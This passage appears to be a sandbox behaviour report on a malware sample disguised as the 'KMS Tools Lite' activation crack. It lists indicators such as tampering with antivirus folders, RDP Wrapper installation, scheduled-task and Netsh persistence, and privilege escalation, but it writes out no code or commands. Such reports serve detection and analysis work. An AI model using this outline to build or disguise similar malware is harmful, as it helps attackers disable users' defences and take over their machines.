File opened for modification C:\Program Files (x86)\360 C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Common Files\AV C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Panda Security C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\IObit C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Transmission C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\RDP Wrapper C:\ProgramData\Setup\smss.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\HitmanPro C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Kaspersky Lab C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Bitdefender Agent C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Wise C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ByteFence C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Cezurity C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Rainmeter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ESET C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\SUPERAntiSpyware C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\MSI\MSI Center C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\NETGATE C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Enigma Software Group C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVG C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Ravantivirus C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\IObit\IObit Malware Fighter C:\ProgramData\Setup\update.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification_fast.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-fr.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-te.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\nl\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-as.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\auto_open_controller.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\fi\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\nl\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\id\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Mini-Wallet\miniwallet.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-icon.svg C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-webui-992.268aa821c3090dce03cb.chunk.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-NL C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-ec\fi\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\el\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\zh-Hans\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\edge_driver.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\edge_driver.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-ec\cs\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\fr-CA\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification_fast.bundle.js.LICENSE.txt C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Tokenized-Card\tokenized-card.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-webui-708.de49febeeb0e9c77883f.chunk.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\ar\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\cs\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_700750315\deny_domains.list C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\de\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\es\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-mn-cyrl.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-DE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\it\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\ar\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\fr-CA\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\fr\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\wallet\wallet-checkout\merchant-site-info.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-de-1996.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\runtime.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_1498492656\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-bg.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\product_page.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\hu\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\pt-BR\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-FR C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_2024013401\sets.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_1972247359\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\wallet\wallet-notification-config.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification.html C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\edge_checkout_page_validator.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\bnpl\bnpl.html C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\sv\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\el\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping468_693472959\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_700750315\deny_etld1_domains.list C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-sl.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\crypto.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\de\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\zh-Hans\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Setup\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Setup\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\RDPWinst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\KMS Tools Lite Portable\GSetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Microsoft\win.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Windows Tasks Service\winserv.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\Setup\smss.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\Setup\smss.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895695533523394" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage C:\ProgramData\Setup\smss.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3457531954-2054407110-1019940402-1000\{6D6688C3-7945-484D-B534-F54B959BC780} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3457531954-2054407110-1019940402-1000\{B2EED048-F807-45D8-9CDA-850EE2E93D88} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database C:\ProgramData\Setup\smss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset C:\ProgramData\Setup\smss.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\ProgramData\Setup\winmgmts:\ C:\ProgramData\Setup\IP.exe N/A
File opened for modification C:\ProgramData\Setup\WinMgmts:\ C:\ProgramData\Setup\IP.exe N/A
File opened for modification C:\ProgramData\Setup\winmgmts:\ C:\ProgramData\Setup\smss.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\KMS Tools Lite Portable\GSetup.exe N/A
N/A N/A C:\Windows\SysWOW64\unsecapp.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\RDPWinst.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
